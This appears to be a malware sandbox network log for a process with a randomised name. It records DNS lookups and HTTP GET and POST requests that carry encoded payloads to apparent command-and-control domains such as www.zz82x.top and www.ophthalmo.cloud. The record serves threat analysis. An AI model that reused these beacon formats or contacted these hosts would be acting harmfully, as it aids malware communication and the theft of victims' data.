Jan 11, 2025 06:33:22.164094925 CET | 1.1.1.1 | 192.168.2.8 | 0xba2d | No error (0) | www.lanxuanz.tech | zhs.zohosites.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 06:33:22.164094925 CET | 1.1.1.1 | 192.168.2.8 | 0xba2d | No error (0) | zhs.zohosites.com | | 136.143.186.12 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:33:36.047503948 CET | 1.1.1.1 | 192.168.2.8 | 0x391b | No error (0) | www.astrafusion.xyz | | 199.192.21.169 | A (IP address) | IN (0x0001) | false
• www.healthyloveforall.net
• www.zz82x.top
• www.ophthalmo.cloud
• www.ngmr.xyz
• www.specialgift.asia
• www.030002803.xyz
• www.2bhp.com
• www.lanxuanz.tech
• www.astrafusion.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49710 | 3.33.130.190 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:31:32.060307026 CET | 523 | OUT | GET /r22w/?1ZqD=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q==&dbFX6=JLnL0 HTTP/1.1
Host: www.healthyloveforall.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Jan 11, 2025 06:31:40.439129114 CET | 385 | IN | HTTP/1.1 200 OK
content-type: text/html
date: Sat, 11 Jan 2025 05:31:40 GMT
content-length: 264
connection: close
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1ZqD=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q==&dbFX6=JLnL0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49714 | 38.47.232.196 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:31:59.119663000 CET | 766 | OUT | POST /fk06/ HTTP/1.1
Host: www.zz82x.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.zz82x.top
Connection: close
Content-Length: 205
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.zz82x.top/fk06/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Ascii: 1ZqD=3wyGWJa50eJ6lbVimn8hBjsUUx5LDJCLlRo8CgBiVyu4QVucfQtsXzbCjjE3cMixJ2+e8o+NBQ0wyRJpt3a8stjvLiKP+ZK9bp4o8kN6FMlxUR+BmosRPQWX5RsukAsEVp/Ztt1x/AHZmqriIHQCcej8WZKhOfyY1Jg96QTOVabzIpiOOk8TFKkxPYlhH6L6mkWmezM=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49715 | 38.47.232.196 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:32:01.666533947 CET | 786 | OUT | POST /fk06/ HTTP/1.1
Host: www.zz82x.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.zz82x.top
Connection: close
Content-Length: 225
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.zz82x.top/fk06/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Ascii: 1ZqD=3wyGWJa50eJ6l7FinG8hHDsXIh5LKpCPlRU8CityVga4Q3GceVBsWzbCtDE2Ssi4J2z+8qqNBRQwyUlptgG/2djtDCKNz5K9bp4o8kYfFNBxUBOB0JsWGwWQxxsuzwsAVp/BtvBL/GLZmvXiIUIDFuj+IZL/YdeQ5bkjwSTdVYaXJfPkUG0VGKMaPbNXCNWS8HGWAkYAkgzv+uFk3dolr7GAP0pH


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49716 | 38.47.232.196 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:32:04.208389997 CET | 1803 | OUT | POST /fk06/ HTTP/1.1
Host: www.zz82x.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.zz82x.top
Connection: close
Content-Length: 1241
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.zz82x.top/fk06/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Data Ascii: 1ZqD= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49717 | 38.47.232.196 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:32:06.753786087 CET | 511 | OUT | GET /fk06/?1ZqD=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==&dbFX6=JLnL0 HTTP/1.1
Host: www.zz82x.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49718 | 217.160.0.207 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:32:13.866683006 CET | 784 | OUT | POST /mgg3/ HTTP/1.1
Host: www.ophthalmo.cloud
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.ophthalmo.cloud
Connection: close
Content-Length: 205
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ophthalmo.cloud/mgg3/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 70 4d 50 46 43 68 37 66 31 70 67 4f 4c 33 49 52 73 6b 67 63 35 30 2b 4a 55 68 44 30 75 50 6b 6f 77 32 53 4c 6b 62 35 41 4d 4e 78 52 65 66 6f 4a 56 73 48 79 74 4c 50 31 4d 49 78 73 58 72 66 52 71 78 63 7a 4d 5a 64 6a 7a 32 35 6c 34 2f 4b 46 50 47 6b 71 2f 36 66 4a 32 37 48 77 2f 50 62 58 31 68 6f 46 59 78 68 46 57 67 41 41 69 33 6a 31 69 36 39 39 79 55 56 51 41 56 4e 66 53 6c 61 35 79 53 2f 44 53 4c 38 6b 79 39 72 6d 2f 58 76 4d 63 53 41 37 46 64 6b 4f 33 66 6c 54 41 49 2f 39 33 65 50 73 34 70 67 45 41 6c 71 38 43 2b 73 37 77 52 75 45 4d 6e 64 6f 6d 69 77 3d
                                                                    Data Ascii: 1ZqD=tGqcJQu3iOnopMPFCh7f1pgOL3IRskgc50+JUhD0uPkow2SLkb5AMNxRefoJVsHytLP1MIxsXrfRqxczMZdjz25l4/KFPGkq/6fJ27Hw/PbX1hoFYxhFWgAAi3j1i699yUVQAVNfSla5yS/DSL8ky9rm/XvMcSA7FdkO3flTAI/93ePs4pgEAlq8C+s7wRuEMndomiw=
                                                                    Jan 11, 2025 06:32:14.495951891 CET | 779 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Date: Sat, 11 Jan 2025 05:32:14 GMT
                                                                    Server: Apache
                                                                    X-Frame-Options: deny
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                    Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.8 | 49719 | 217.160.0.207 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:16.412672997 CET | 804 | OUT | POST /mgg3/ HTTP/1.1
                                                                    Host: www.ophthalmo.cloud
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ophthalmo.cloud
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ophthalmo.cloud/mgg3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 72 74 2f 46 45 43 6a 66 2b 70 67 4e 4f 33 49 52 32 55 68 58 35 30 69 4a 55 6a 76 6b 75 64 51 6f 7a 58 69 4c 6e 61 35 41 42 74 78 52 52 2f 6f 56 4b 38 48 70 74 4c 44 44 4d 4d 78 73 58 74 7a 52 71 77 73 7a 4c 75 78 6b 7a 6d 35 6a 77 66 4b 44 58 6d 6b 71 2f 36 66 4a 32 37 6a 57 2f 50 44 58 30 56 73 46 59 54 4a 47 58 67 41 50 6c 33 6a 31 70 61 39 35 79 55 55 31 41 51 73 43 53 6e 69 35 79 53 50 44 53 36 38 6a 34 39 72 67 78 33 75 2b 61 41 42 70 46 73 30 6f 78 70 74 38 4e 4a 32 48 32 6f 69 47 69 4c 6f 43 44 6c 43 58 43 39 45 4e 31 6d 7a 73 57 45 4e 59 34 31 6b 72 7a 6e 69 70 57 66 71 37 30 49 76 39 75 50 6a 4a 35 35 6c 68
                                                                    Data Ascii: 1ZqD=tGqcJQu3iOnort/FECjf+pgNO3IR2UhX50iJUjvkudQozXiLna5ABtxRR/oVK8HptLDDMMxsXtzRqwszLuxkzm5jwfKDXmkq/6fJ27jW/PDX0VsFYTJGXgAPl3j1pa95yUU1AQsCSni5ySPDS68j49rgx3u+aABpFs0oxpt8NJ2H2oiGiLoCDlCXC9EN1mzsWENY41krznipWfq70Iv9uPjJ55lh
                                                                    Jan 11, 2025 06:32:17.062359095 CET | 779 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Date: Sat, 11 Jan 2025 05:32:16 GMT
                                                                    Server: Apache
                                                                    X-Frame-Options: deny
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                    Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.8 | 49720 | 217.160.0.207 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:18.963241100 CET | 1821 | OUT | POST /mgg3/ HTTP/1.1
                                                                    Host: www.ophthalmo.cloud
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ophthalmo.cloud
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ophthalmo.cloud/mgg3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 72 74 2f 46 45 43 6a 66 2b 70 67 4e 4f 33 49 52 32 55 68 58 35 30 69 4a 55 6a 76 6b 75 64 49 6f 77 68 65 4c 31 35 42 41 41 74 78 52 59 66 6f 57 4b 38 47 37 74 4c 62 66 4d 4e 4d 4f 58 75 48 52 6c 32 34 7a 4f 63 4a 6b 38 6d 35 6a 79 66 4b 43 50 47 6c 69 2f 36 50 4e 32 37 7a 57 2f 50 44 58 30 55 63 46 52 68 68 47 61 41 41 41 69 33 6a 79 69 36 39 52 79 51 34 44 41 51 70 31 56 58 43 35 38 57 6a 44 55 59 6b 6a 6c 4e 72 69 79 33 75 6d 61 41 4d 33 46 73 6f 4f 78 70 78 57 4e 4f 36 48 37 5a 48 61 77 50 77 2b 59 56 57 48 4d 71 55 54 2b 68 47 4d 66 79 64 57 6c 55 59 7a 2f 43 75 66 57 2b 50 7a 78 5a 36 51 34 5a 7a 6a 6f 65 4d 4d 6f 39 30 69 32 62 2f 42 35 6b 74 74 56 67 57 68 4b 38 46 71 36 35 66 74 6c 34 57 71 73 52 72 31 4f 33 35 4d 58 67 75 62 78 39 55 57 4c 57 75 67 34 6a 7a 48 62 2b 66 54 5a 47 4d 76 74 45 4a 59 4f 51 4c 77 75 62 69 50 6f 35 72 63 53 31 50 79 65 56 48 7a 44 75 4d 6c 55 4c 7a 66 4b 79 65 43 6b 2f 47 75 6e 75 49 76 7a 34 48 4a 46 57 62 4b 56 [TRUNCATED]
                                                                    Data Ascii: 1ZqD=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 [TRUNCATED]
                                                                    Jan 11, 2025 06:32:19.589622021 CET | 779 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Date: Sat, 11 Jan 2025 05:32:19 GMT
                                                                    Server: Apache
                                                                    X-Frame-Options: deny
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                    Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.8 | 49721 | 217.160.0.207 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:21.500574112 CET | 517 | OUT | GET /mgg3/?1ZqD=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.ophthalmo.cloud
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:32:22.136074066 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Content-Length: 1271
                                                                    Connection: close
                                                                    Date: Sat, 11 Jan 2025 05:32:22 GMT
                                                                    Server: Apache
                                                                    X-Frame-Options: deny
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                                    Jan 11, 2025 06:32:22.136101961 CET | 203 | IN | Data Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                                                    Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.8 | 49722 | 54.67.87.110 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:27.489717960 CET | 763 | OUT | POST /qj8y/ HTTP/1.1
                                                                    Host: www.ngmr.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ngmr.xyz
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ngmr.xyz/qj8y/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 59 4a 45 52 33 58 44 44 64 71 51 35 43 51 2b 2b 68 4b 41 32 6b 6a 58 68 51 61 76 64 6a 49 6d 50 53 4f 2f 32 6f 4e 58 33 42 42 53 4b 77 74 72 6e 75 78 76 44 51 78 2b 37 4c 57 4a 6d 42 7a 34 30 57 2b 7a 6a 42 58 65 58 37 2b 37 61 31 76 64 52 6b 57 68 45 67 56 31 67 39 56 31 6c 4f 59 55 34 31 4c 34 6b 58 33 69 72 65 73 6e 73 2f 34 61 39 37 6a 42 5a 34 58 6e 4d 50 7a 65 70 79 70 6c 79 36 71 34 4f 33 43 6d 41 64 37 50 4e 6f 75 4b 45 46 4a 43 61 30 67 63 6a 65 32 56 4f 4f 61 69 56 6b 57 48 6e 33 4f 2f 38 72 52 62 57 54 47 63 2f 52 66 51 76 2f 5a 78 37 5a 71 79 47 47 50 58 74 32 55 6e 75 52 59 51 3d
